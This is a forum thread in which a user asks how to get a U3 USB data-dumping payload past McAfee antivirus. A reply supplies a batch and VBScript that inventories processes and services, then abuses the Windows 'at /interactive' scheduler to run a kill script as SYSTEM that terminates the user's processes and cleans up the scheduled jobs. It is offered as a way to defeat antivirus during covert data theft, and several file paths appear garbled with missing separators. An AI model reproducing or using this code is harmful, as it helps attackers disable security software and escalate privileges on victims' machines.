Jump to content

Recommended Posts

Posted

OK I have been reading the forum, and i cant seem to find a way to get past  the anti virus software (Mcafee).  I am using the payload designed by - GonZor -, where the apps are on the CD partion of the u3, and the dump is on the  other side.  It is quit possible that I am just an idiot and have overlooked the thread.  Any pointers or suggestions (criticism lol) are very welcome. 

  • 1 month later...
Posted

beat antivirus ?

here some codes to get your process/service  killing on..

@echo off
echo ===========================================
echo reportNkillall.exe 3.0
echo This program will dump to a txt file (process file dll, startup and services items to ...
echo %userprofile%desktopDLLLIST.TXT
echo after the dump is complete it will try and kill all task that are under %user% 
echo NOTE: ( you may need to press CTRL+ALT+DEL ) to run explore again
echo ===========================================
echo http://rmccurdy.com


LISTDLLS.exe > "%userprofile%desktopDLLLIST.TXT"
sc query state= all | find "NAME" >> "%userprofile%desktopDLLLIST.TXT"
autorunsc.exe >> "%userprofile%desktopDLLLIST.TXT"

copy cax.exe %temp%
echo c:cax.exe /killuser %USERNAME% > c:kill.bat

RUNAS_SYSTEM.vbs

RUNAS_SYSTEM.vbs

set WshShell = CreateObject("WScript.Shell")


WshShell.Run ("at  " & hour(now) & ":" & minute(now)+1 & "am /interactive cmd.exe /c c:kill.bat")
WshShell.Run ("at  " & hour(now) & ":" & minute(now)+1 & "pm /interactive cmd.exe /c c:kill.bat")

WScript.Sleep 65000
WshShell.Run ("at /delete /yes")

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...